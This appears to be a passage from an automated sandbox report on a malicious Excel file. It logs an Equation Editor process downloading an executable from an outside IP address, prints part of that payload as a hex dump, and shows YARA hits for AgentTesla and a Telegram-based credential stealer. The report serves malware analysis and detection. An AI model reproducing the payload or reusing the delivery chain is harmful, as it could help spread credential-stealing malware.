                          May 13, 2022 16:59:58.960202932 CEST192.168.2.228.8.8.80x39acStandard query (0)api.telegram.orgA (IP address)IN (0x0001)

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          May 13, 2022 16:59:58.979049921 CEST8.8.8.8192.168.2.220x39acNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                          HTTP Request Dependency Graph

                          • 172.245.27.27

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.2249171172.245.27.2780C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          TimestampkBytes transferredDirectionData
                          May 13, 2022 16:58:18.682598114 CEST2OUTGET /SOA.exe HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: 172.245.27.27
                          Connection: Keep-Alive
                          May 13, 2022 16:58:18.802066088 CEST3INHTTP/1.1 200 OK
                          Date: Fri, 13 May 2022 14:58:18 GMT
                          Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.28
                          Last-Modified: Thu, 12 May 2022 04:27:00 GMT
                          ETag: "cb600-5dec8f8138359"
                          Accept-Ranges: bytes
                          Content-Length: 833024
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/x-msdownload
                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 90 8c 7c 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 a2 0c 00 00 12 00 00 00 00 00 00 1e c1 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc c0 0c 00 4f 00 00 00 00 e0 0c 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 a1 0c 00 00 20 00 00 00 a2 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 0f 00 00 00 e0 0c 00 00 10 00 00 00 a4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 b4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 80 08 00 dc 3f 04 00 03 00 00 00 86 03 00 06 e8 66 01 00 08 1a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1e 02 28 23 00 00 0a 2a 26 00 02 28 24 00 00 0a 00 2a ce 73 25 00 00 0a 80 01 00 00 04 73 26 00 00 0a 80 02 00 00 04 73 27 00 00 0a 80 03 00 00 04 73 28 00 00 0a 80 04 00 00 04 73 29 00 00 0a 80 05 00 00 04 2a 5a 00 03 fe 16 06 00 00 1b 6f 31 00 00 0a 00 03 fe 15 06 00 00 1b 2a 26 00 02 28 32 00 00 0a 00 2a 6a 02 02 7b 07 00 00 04 28 02 00 00 2b 7d 07 00 00 04 02 7b 07 00 00 04 2b 00 2a 6a 02 02 7b 08 00 00 04 28 03 00 00 2b 7d 08 00 00 04 02 7b 08 00 00 04 2b 00 2a 6a 02 02 7b 09 00 00 04 28 04 00 00 2b 7d 09 00 00 04 02 7b 09 00 00 04 2b 00 2a 6a 02 02 7b 0a 00 00 04 28 05 00 00 2b 7d 0a 00 00 04 02 7b 0a 00 00 04 2b 00 2a 6a 02 02 7b 0b 00 00 04 28 06 00 00 2b 7d 0b 00 00 04 02 7b 0b 00 00 04 2b 00 2a 6a 02 02 7b 0c 00 00 04 28 07 00 00 2b 7d 0c 00 00 04 02 7b 0c 00 00 04 2b 00 2a 6a 02 02 7b 0d 00 00 04 28 08 00 00 2b 7d 0d 00 00 04 02 7b 0d 00 00 04 2b 00 2a 6a 02 02 7b 0e 00 00 04 28 09 00 00 2b 7d 0e 00 00 04 02 7b 0e 00 00 04 2b 00 2a 6a 02 02 7b 0f 00 00 04 28 0a 00 00 2b 7d 0f 00 00 04 02 7b 0f 00 00 04 2b 00 2a 6a 02 02 7b 10 00 00 04 28 0b 00 00 2b 7d 10 00 00 04 02 7b 10 00 00 04 2b 00 2a 6a 02 02 7b 11 00 00 04 28 0c 00 00 2b 7d 11 00 00 04 02 7b 11 00 00 04 2b 00 2a 6a 02 02 7b 12 00 00 04 28 0d 00 00 2b 7d
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL|bP @ @O H.text$ `.rsrc@@.reloc@BH?f*(#*&($*s%s&s's(s)*Zo1*&(2*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}{+*j{(+}


                          Statistics

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:16:57:16
                          Start date:13/05/2022
                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                          Imagebase:0x13fbd0000
                          File size:28253536 bytes
                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:2
                          Start time:16:57:41
                          Start date:13/05/2022
                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                          Imagebase:0x400000
                          File size:543304 bytes
                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Target ID:4
                          Start time:16:57:45
                          Start date:13/05/2022
                          Path:C:\Users\Public\vbc.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\Public\vbc.exe"
                          Imagebase:0x8d0000
                          File size:833024 bytes
                          MD5 hash:F18604D5FC3E2930E85C403E0E80A459
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 46%, ReversingLabs
                          Reputation:low

                          General

                          Target ID:5
                          Start time:16:57:55
                          Start date:13/05/2022
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:{path}
                          Imagebase:0x13d0000
                          File size:45216 bytes
                          MD5 hash:62CE5EF995FD63A1847A196C2E8B267B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.985108064.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.985108064.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.985373041.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.985373041.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:moderate

                          Disassembly

                          No disassembly